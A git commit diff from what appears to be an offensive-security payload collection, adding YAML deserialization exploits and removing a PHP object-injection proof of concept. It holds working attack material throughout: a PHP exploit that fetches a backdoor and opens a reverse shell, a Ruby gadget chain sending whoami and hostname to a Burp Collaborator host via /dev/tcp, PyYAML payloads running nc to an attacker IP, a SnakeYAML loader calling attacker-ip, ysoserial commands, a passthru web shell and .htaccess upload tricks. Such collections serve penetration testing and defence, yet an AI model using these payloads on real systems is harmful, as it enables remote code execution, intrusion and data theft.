YAML Deserialization
This commit is contained in:
parent
e677f07197
commit
267713c0fb
9 changed files with 162 additions and 69 deletions
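--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,3 @@
 BuildPDF/
 .vscode
 .todo
-AWS Amazon Lambda/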
@ -1,32 +0,0 @@
|
||||||
<?php
|
|
||||||
/*
|
|
||||||
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
|
||||||
|
|
||||||
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
|
||||||
|
|
||||||
Shouts to @jstnkndy @yappare for the assist!
|
|
||||||
|
|
||||||
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
|
||||||
*/
|
|
||||||
|
|
||||||
print "==============================================================================\r\n";
|
|
||||||
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
|
||||||
print "==============================================================================\r\n";
|
|
||||||
print "[+] Generating serialized payload...[OK]\r\n";
|
|
||||||
print "[+] Launching reverse listener...[OK]\r\n";
|
|
||||||
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
|
||||||
|
|
||||||
class PHPObjectInjection
|
|
||||||
{
|
|
||||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
|
||||||
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
|
||||||
}
|
|
||||||
|
|
||||||
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
|
||||||
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
|
||||||
print "[+] Sending exploit...[OK]\r\n";
|
|
||||||
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
|
||||||
print "==============================================================================\r\n";
|
|
||||||
$response = file_get_contents("$url");
|
|
||||||
|
|
||||||
?>
|
|
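--- a/Insecure Deserialization/Files/ruby-serialize.yaml
+++ b/Insecure Deserialization/Files/ruby-serialize.yaml
@@ -0,0 +1,19 @@
+---
+- !ruby/object:Gem::Installer
+i: x
+- !ruby/object:Gem::SpecFetcher
+i: y
+- !ruby/object:Gem::Requirement
+requirements:
+!ruby/object:Gem::Package::TarReader
+io: &1 !ruby/object:Net::BufferedIO
+io: &1 !ruby/object:Gem::Package::TarReader::Entry
+read: 0
+header: "abc"
+debug_output: &1 !ruby/object:Net::WriteAdapter
+socket: &1 !ruby/object:Gem::RequestSet
+sets: !ruby/object:Net::WriteAdapter
+socket: !ruby/module 'Kernel'
+method_id: :system
+git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
+method_id: :resolve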
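Review bot: The `&1` anchor is defined four times in this file (`io: &1 !ruby/object:Net::BufferedIO`, `io: &1 !ruby/object:Gem::Package::TarReader::Entry`, `debug_output: &1 !ruby/object:Net::WriteAdapter`, `socket: &1 !ruby/object:Gem::RequestSet`) and is never referenced by a `*1` alias, so each redefinition is dead markup that a strict YAML linter is likely to flag; anchors with no alias do not change the deserialized structure, so they can simply be dropped. The `git_set` line also hardcodes a Burp Collaborator hostname bound to one author's session, whereas the copy of the same document added in YAML.md uses `sleep 600`; a labelled placeholder such as `<CALLBACK_HOST>` would keep the two copies consistent. Since the file has no comment at all, a one-line header such as `# Ruby YAML.load gadget chain; see Ruby.md. Mitigation: Psych.safe_load / YAML.safe_load on untrusted input` would make it self-describing for readers who land on it without the markdown.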
@ -11,7 +11,7 @@
|
||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||||
|
|
||||||
```java
|
```java
|
||||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||||
|
@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
|
||||||
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
||||||
```
|
```
|
||||||
|
|
||||||
payload | author | dependencies | impact (if not RCE)
|
```ps1
|
||||||
------|--------|------ |------
|
Payload Authors Dependencies
|
||||||
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5
|
------- ------- ------------
|
||||||
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||||
Clojure |@JackOfMostTrades |clojure:1.8.0
|
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||||
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||||
CommonsCollections1 |@frohoff |commons-collections:3.1
|
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||||
CommonsCollections2 |@frohoff |commons-collections4:4.0
|
Clojure @JackOfMostTrades clojure:1.8.0
|
||||||
CommonsCollections3 |@frohoff |commons-collections:3.1
|
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||||
CommonsCollections4 |@frohoff |commons-collections4:4.0
|
CommonsCollections1 @frohoff commons-collections:3.1
|
||||||
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
|
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||||
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
|
CommonsCollections3 @frohoff commons-collections:3.1
|
||||||
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
|
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||||
Groovy1 |@frohoff |groovy:2.3.9
|
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||||
Hibernate1 |@mbechler|
|
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||||
Hibernate2 |@mbechler|
|
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||||
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||||
JRMPClient |@mbechler|
|
Groovy1 @frohoff groovy:2.3.9
|
||||||
JRMPListener |@mbechler|
|
Hibernate1 @mbechler
|
||||||
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
Hibernate2 @mbechler
|
||||||
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||||
Jdk7u21 |@frohoff|
|
JRMPClient @mbechler
|
||||||
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2
|
JRMPListener @mbechler
|
||||||
MozillaRhino1 |@matthias_kaiser |js:1.7R2
|
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||||
Myfaces1 |@mbechler|
|
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||||
Myfaces2 |@mbechler|
|
Jdk7u21 @frohoff
|
||||||
ROME |@mbechler |rome:1.0
|
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||||
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||||
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
MozillaRhino2 @_tint0 js:1.7R2
|
||||||
URLDNS |@gebl| | jre only vuln detect
|
Myfaces1 @mbechler
|
||||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
Myfaces2 @mbechler
|
||||||
|
ROME @mbechler rome:1.0
|
||||||
|
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||||
|
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||||
|
URLDNS @gebl
|
||||||
|
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||||
|
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||||
|
```
|
||||||
|
|
||||||
## Burp extensions using ysoserial
|
## Burp extensions using ysoserial
|
||||||
|
|
||||||
|
@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:
|
||||||
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
||||||
|
|
||||||
```java
|
```java
|
||||||
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||||
|
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
|
||||||
|
|
||||||
where
|
where
|
||||||
-a - generates/tests all payloads for that marshaller
|
-a - generates/tests all payloads for that marshaller
|
||||||
|
@ -101,6 +109,8 @@ Payload generators for the following marshallers are included:<br />
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||||
|
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
||||||
|
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
||||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||||
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||||
|
|
|
@ -8,6 +8,7 @@ Check the following sub-sections, located in other files :
|
||||||
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
||||||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||||
* [Python : pickle, ...](Python.md)
|
* [Python : pickle, ...](Python.md)
|
||||||
|
* [YAML : PyYAML, ...](YAML.md)
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -60,3 +60,4 @@ Universal gadget for ruby 2.x - 3.x.
|
||||||
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
||||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||||
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
||||||
|
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
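--- a/Insecure Deserialization/YAML.md
+++ b/Insecure Deserialization/YAML.md
@@ -0,0 +1,89 @@
+# YAML Deserialization
+
+## Summary
+
+* [Tools](#tools)
+* [Exploit](#exploit)
+* [PyYAML](#pyyaml)
+* [ruamel.yaml](#ruamelyaml)
+* [Ruby](#ruby)
+* [SnakeYAML](#snakeyaml)
+* [References](#references)
+
+## Tools
+
+* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
+* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
+* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
+
+## Exploit
+
+### PyYAML
+
+```yaml
+!!python/object/apply:time.sleep [10]
+!!python/object/apply:builtins.range [1, 10, 1]
+!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
+!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
+!!python/object/new:subprocess [["ls","-ail"]]
+!!python/object/new:subprocess.check_output [["ls","-ail"]]
+```
+
+```yaml
+!!python/object/apply:subprocess.Popen
+- ls
+```
+
+```yaml
+!!python/object/new:str
+state: !!python/tuple
+- 'print(getattr(open("flag\x2etxt"), "read")())'
+- !!python/object/new:Warning
+state:
+update: !!python/name:exec
+```
+
+## Ruamel.yaml
+
+## Ruby
+
+```ruby
+---
+- !ruby/object:Gem::Installer
+i: x
+- !ruby/object:Gem::SpecFetcher
+i: y
+- !ruby/object:Gem::Requirement
+requirements:
+!ruby/object:Gem::Package::TarReader
+io: &1 !ruby/object:Net::BufferedIO
+io: &1 !ruby/object:Gem::Package::TarReader::Entry
+read: 0
+header: "abc"
+debug_output: &1 !ruby/object:Net::WriteAdapter
+socket: &1 !ruby/object:Gem::RequestSet
+sets: !ruby/object:Net::WriteAdapter
+socket: !ruby/module 'Kernel'
+method_id: :system
+git_set: sleep 600
+method_id: :resolve
+```
+
+## SnakeYAML
+
+```yaml
+!!javax.script.ScriptEngineManager [
+!!java.net.URLClassLoader [[
+!!java.net.URL ["http://attacker-ip/"]
+]]
+]
+```
+
+
+## References
+
+* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
+* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
+* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
+* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
+* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)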
@ -0,0 +1 @@
|
||||||
|
AddType application/x-httpd-php .rce
|
|
@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess
|
||||||
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
|
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
# .htaccess simple php
|
||||||
|
|
||||||
|
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
|
||||||
|
Then upload any file with `.rce` extension.
|
||||||
|
|
||||||
# .htaccess upload as image
|
# .htaccess upload as image
|
||||||
|
|
||||||
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
|
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
|
||||||
|
|